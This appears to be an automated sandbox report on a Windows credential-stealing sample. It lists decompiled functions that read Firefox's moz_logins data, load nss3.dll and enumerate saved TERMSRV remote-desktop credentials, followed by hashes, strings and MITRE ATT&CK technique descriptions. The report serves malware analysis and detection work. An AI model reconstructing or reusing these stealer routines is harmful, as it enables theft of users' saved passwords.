API String ID: 2489594185-473154195
Opcode ID: a2b115aa1aa571a68be8ce4951556402be1d1c12837cc5314d994e54b7dd4129
Instruction ID: 067bfa4a53f500e918e8827405899557c221b1b6cfe0abe27263aec1400916df
Opcode Fuzzy Hash: a2b115aa1aa571a68be8ce4951556402be1d1c12837cc5314d994e54b7dd4129
Instruction Fuzzy Hash: E531FC35A4010AFBDF11AFD1CC42FEEBB72AF04714F208266B610791F1D7769A50AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004016F2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004016F2(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t27;
				signed int _t41;
				signed int _t42;
				signed int _t45;

				_t49 = __edx;
				_t45 = 0;
				_t27 =  &_v8;
				_push(_t27);
				_push(_a4);
				L00410DBE();
				if(_t27 >= 0) {
					_v16 = E0040106A(_t27, __edx, _a4);
					_t27 = GlobalLock(_v8);
					if(_t27 != 0) {
						_v20 = _t27;
						_v24 = E004017EC(E004124C2() + 0x500000);
						_v28 = E004017EC(E004124C8(_v16) + 0x100000);
						_v12 = E004124D6(_v20, _v28, _v16, _v24, 0, _v16);
						E004012C7(GlobalUnlock(_v8), _t49, _a4);
						_t41 = E0040149B(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
						_t42 = E00401486(_a4, _v16);
						_t45 = _t41 & _t42 & E004014BC(_a4, _v28, _v12);
						E004017D5(_v24);
						_t27 = E004017D5(_v28);
					}
				}
				E0040125A(_t27, _t49, _a4);
				return _t45;
			}

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 00401702
GlobalLock.KERNEL32 ref: 0040171D

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalUnlock.KERNEL32(?,?,?,?,?,-00100000,-00500000), ref: 0040177B

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040178A

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlock
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 1329788818-258907703
Opcode ID: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
Instruction ID: f2d47b6307a512ba182872b571bc651cab0e361a1f568c2dbe9588986264a33a
Opcode Fuzzy Hash: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
Instruction Fuzzy Hash: 1D212CB6D00108BFDF026FE2CD42AEDBE75EF10344F10413AB914B51B1E77A8AA09B59

Uniqueness

Uniqueness Score: -1.00%

Function 00408390, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408390(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* _t47;
				char* _t49;
				char** _t50;
				char* _t70;
				void* _t71;
				char* _t72;
				char* _t73;
				char* _t74;
				char* _t75;
				void* _t76;

				_t76 = __eflags;
				_t71 = __edx;
				E00401388(_t47, _a4, 1, _a16);
				_t49 = E00401304(_t76, _a4, _a16);
				_t74 = _t49;
				while(1) {
					_t75 = _t74;
					if(_t75 == 0) {
						break;
					}
					_t50 = _a16;
					__eflags =  *_t50;
					if( *_t50 == 0) {
						return _t50;
					}
					_v8 = 0;
					_t72 = E004082CF(_t71, _a4, _a12, _a16,  &_v8);
					__eflags = _v8;
					if(_v8 == 0) {
						_v24 = 0;
					} else {
						_t70 = StrStrIA(_v8, "http://");
						__eflags = _t70;
						if(_t70 == 0) {
							_t70 = StrStrIA(_v8, "https://");
						}
						_v24 = _t70;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E00401486(_a8, 0xbeef0001);
						E004014E8(_a8, _v8);
					}
					while(1) {
						_t73 = _t72;
						__eflags = _t73;
						if(_t73 == 0) {
							break;
						}
						__eflags =  *_a16;
						if( *_a16 != 0) {
							_v12 = 0;
							_v16 = 0;
							_v20 = 0;
							E0040834C(_t71, _a4, _a16,  &_v12,  &_v16,  &_v20);
							__eflags = _v24;
							if(_v24 != 0) {
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										L17:
										E004014E8(_a8, _v12);
										E004014E8(_a8, _v16);
										E004014E8(_a8, _v20);
									} else {
										__eflags = _v20;
										if(_v20 != 0) {
											goto L17;
										}
									}
								}
							}
							E004017D5(_v12);
							E004017D5(_v16);
							E004017D5(_v20);
							_t72 = _t73 - 1;
							__eflags = _t72;
							continue;
						} else {
						}
						break;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E00401486(_a8, 0);
						E00401486(_a8, 0);
						E00401486(_a8, 0);
					}
					_t49 = E004017D5(_v8);
					_t74 = _t75 - 1;
					__eflags = _t74;
				}
				return _t49;
			}

Strings

http://, xrefs: 004083E5
https://, xrefs: 004083F6

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: http://$https://
API String ID: 0-1916535328
Opcode ID: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
Instruction ID: 13fb2b29f01f002918b78c72c7eb8ae77e77f5b78bf32f99a3c6c152548360db
Opcode Fuzzy Hash: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
Instruction Fuzzy Hash: CF41053180010AFBDF22AF91CE05BDE7B76AF00314F10817AB950351F1EB794AA0EB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5BD, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 88stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(abe2869f-9b47-4cd9-a358-c22904dba7f7,?,?,00000000), ref: 0040A66D
LocalFree.KERNEL32(00000000), ref: 0040A6CF

Strings

abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0040A5D7, 0040A668, 0040A67A
Microsoft_WinInet_*, xrefs: 0040A62A

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocallstrlen
String ID: Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 3681330831-3320880043
Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C3, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C0C3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;

				if(_a16 == 5) {
					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_t35 = lstrcmpiA(_v20, "moz_logins");
						if(_t35 == 0) {
							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);
								if(_t35 == 0) {
									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x419158 = 0xffffffff;
											 *0x41915c = 0xffffffff;
											 *0x419160 = 0xffffffff;
											_t35 = E0040B69A(_v16, E0040BE43);
											_v28 = 1;
											if( *0x419158 != 0xffffffff &&  *0x41915c != 0xffffffff &&  *0x419160 != 0xffffffff) {
												return E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BEFE);
											}
										}
									}
								}
							}
						}
					}
				}
				return _t35;
			}

APIs

lstrcmpiA.KERNEL32(00000000,moz_logins,?), ref: 0040C101
lstrcmpA.KERNEL32(table,?,00000000,moz_logins,?), ref: 0040C136

Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA

Strings

moz_logins, xrefs: 0040C0F9
table, xrefs: 0040C131

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: moz_logins$table
API String ID: 3524194181-1174185386
Opcode ID: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
Instruction ID: 9aaa2a27647da64927c3ca6f9125f509d968329839c130476f5429ed0db09bc1
Opcode Fuzzy Hash: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
Instruction Fuzzy Hash: 8831D47280020EFADF219F90CC85EDE7B79AB05324F104366E520F51E1DB399B94EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401A09, Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401A09(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v280;
				signed int _v284;
				signed int _t27;
				void* _t29;
				signed int _t44;
				signed int _t46;
				void* _t48;
				void* _t49;

				_t49 = __edx;
				_t48 = __ecx;
				_t27 = GetTickCount();
				asm("rol eax, 0xb");
				_v284 =  !_t27;
				_t46 = 0;
				_t29 =  &_v8;
				_push(_t29);
				_push(_a4);
				L00410DBE();
				if(_t29 >= 0) {
					_v16 = E0040106A(_t29, _t49, _a4);
					_t29 = GlobalLock(_v8);
					_t51 = _t29;
					if(_t29 != 0) {
						_v20 = _t29;
						_v12 = E004017EC(_v16);
						E00401823(_v20, _v12, _v16);
						GlobalUnlock(_v8);
						E0040185C(_t48, _t51,  &_v280,  &_v284, 4);
						E004012C7(E004018C7( &_v280, _v12, _v16), _t49, _a4);
						_t44 = E0040149B(_a4,  &_v284, 4);
						_t46 = _t44 & E0040149B(_a4, _v12, _v16);
						_t29 = E004017D5(_v12);
					}
				}
				E0040125A(_t29, _t49, _a4);
				return _t46;
			}

APIs

GetTickCount.KERNEL32 ref: 00401A13
GetHGlobalFromStream.OLE32(?,?,?,?,00410565,?,?,?,?,Oguqcogtkec,?,?,?,?,00000000,?), ref: 00401A2C
GlobalLock.KERNEL32 ref: 00401A47

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,00410565,?,?,?,?), ref: 00401A6F

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
String ID:
API String ID: 1884134869-0
Opcode ID: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
Instruction ID: 1816704bb606bad1ac1aad56d21282bb97894661860074deb7c63e9bdd074128
Opcode Fuzzy Hash: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
Instruction Fuzzy Hash: 7721797690010CBADF01AFA1DC429EDBFB9EF04344F0041BAB615B50B1EB799B959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC8E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				int _v12;
				char* _t29;
				char* _t32;

				E00401486(_a4, 0xbeef0000);
				E004014E8(_a4, _a8);
				E004014E8(_a4, _a12);
				E004014BC(_a4, _a16, _a20);
				_t29 = StrStrIA(_a12, 0x415f85);
				if(_t29 == 0) {
					_v12 = lstrlenA("TERMSRV/");
					_t32 = StrStrIA(_a12, "TERMSRV/");
					if(_t32 != 0) {
						_a12 = _t32;
					}
					_t29 = E0040370F(_t32, _a12);
					if(_t29 != 0xffffffff) {
						_v8 = _t29;
						E00401486(_a4, 0xbeef0001);
						E004014E8(_a4, _a8);
						E00401486(_a4, _v8);
						return E004014BC(_a4, _a16, _a20);
					}
				}
				return _t29;
			}

APIs

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB

Strings

TERMSRV/, xrefs: 0040CCD6, 0040CCE3

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC8E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				int _v12;
				char* _t29;
				char* _t32;

				E00401486(_a4, 0xbeef0000);
				E004014E8(_a4, _a8);
				E004014E8(_a4, _a12);
				E004014BC(_a4, _a16, _a20);
				_t29 = StrStrIA(_a12, 0x415f85);
				if(_t29 == 0) {
					_v12 = lstrlenA("TERMSRV/");
					_t32 = StrStrIA(_a12, "TERMSRV/");
					if(_t32 != 0) {
						_a12 = _t32;
					}
					_t29 = E0040370F(_t32, _a12);
					if(_t29 != 0xffffffff) {
						_v8 = _t29;
						E00401486(_a4, 0xbeef0001);
						E004014E8(_a4, _a8);
						E00401486(_a4, _v8);
						return E004014BC(_a4, _a16, _a20);
					}
				}
				return _t29;
			}

APIs

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB

Strings

TERMSRV/, xrefs: 0040CCD6, 0040CCE3

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: TERMSRV/
API String ID: 1659193697-3001602198
Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401D69, Relevance: 6.0, APIs: 4, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D69(CHAR* _a4, CHAR* _a8) {
				int _t11;
				CHAR* _t21;

				if(_a4 == 0) {
					_a4 = 0x4140dc;
				}
				if(_a8 == 0) {
					_a8 = 0x4140dc;
				}
				_t11 = lstrlenA(_a4);
				_t21 = E004017EC(_t11 + lstrlenA(_a8) + 1);
				lstrcpyA(_t21, _a4);
				lstrcatA(_t21, _a8);
				if(_a4 != 0x4140dc) {
					E004017D5(_a4);
				}
				return _t21;
			}

0x00401d71
0x00401d73
0x00401d73
0x00401d7e
0x00401d80
0x00401d80
0x00401d8a
0x00401da2
0x00401da8
0x00401db1
0x00401dbd
0x00401dc2
0x00401dc2
0x00401dcb

APIs

lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
Instruction ID: 9ae4c9ae6809e1f747658f89b899b66aaa74484b7ddbf5727539b292c185063a
Opcode Fuzzy Hash: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
Instruction Fuzzy Hash: F3F03075100208BFCF112F62CC81ADE3EA8AF1535CF00C13AB9051A262E7BDC9D48F88

Uniqueness

Uniqueness Score: -1.00%

Function 00408EC5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00408ED8
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408EF9

Strings

nss3.dll, xrefs: 00408F03

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectorylstrlen
String ID: nss3.dll
API String ID: 2713697268-2492180550
Opcode ID: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
Instruction ID: 8c4d155ad2526371845bb933d3f11b8da1162bc186a42e2439c8c001b69ebc86
Opcode Fuzzy Hash: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
Instruction Fuzzy Hash: EA115E71510A01EBDB103F34ED4ABC63FA2EB94354F14803AF441A42A1DB7A55E0CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD3F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040CD3F(intOrPtr _a4) {
				void* _v8;
				char _v12;
				void* _t17;
				intOrPtr* _t23;
				void* _t25;

				if( *0x4143f5 != 0 &&  *0x4143f1 != 0 &&  *0x41442d != 0) {
					_v8 = 0;
					_v12 = 0;
					_t17 =  *0x4143f1("TERMSRV/*", 0,  &_v12,  &_v8);
					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
						_t23 = _v8;
						while(_v12 != 0 &&  *_t23 != 0) {
							E0040CC8E(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
							_t25 = _t23;
							_v12 = _v12 - 1;
							_t23 = _t25 + 4;
							__eflags = _t23;
						}
						return  *0x4143f5(_v8);
					}
				}
				return _t17;
			}

0x0040cd4d
0x0040cd61
0x0040cd68
0x0040cd84
0x0040cd86
0x0040cd94
0x0040cdb7
0x0040cdab
0x0040cdb0
0x0040cdb1
0x0040cdb4
0x0040cdb4
0x0040cdb4
0x00000000
0x0040cdc5
0x0040cd86
0x0040cdcd

APIs

CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD7E
CredFree.ADVAPI32(00000000), ref: 0040CDC5

Strings

TERMSRV/*, xrefs: 0040CD79

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/*
API String ID: 3403564193-275249402
Opcode ID: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
Instruction ID: a372621de2bce721beb090cfe78feac401f7af25901f3d57f49ef118639a82fb
Opcode Fuzzy Hash: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
Instruction Fuzzy Hash: FF115B72910609FBDF218F84D8C9BDABBB4EF04305F14427BE851721E0C7789A84DB9A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
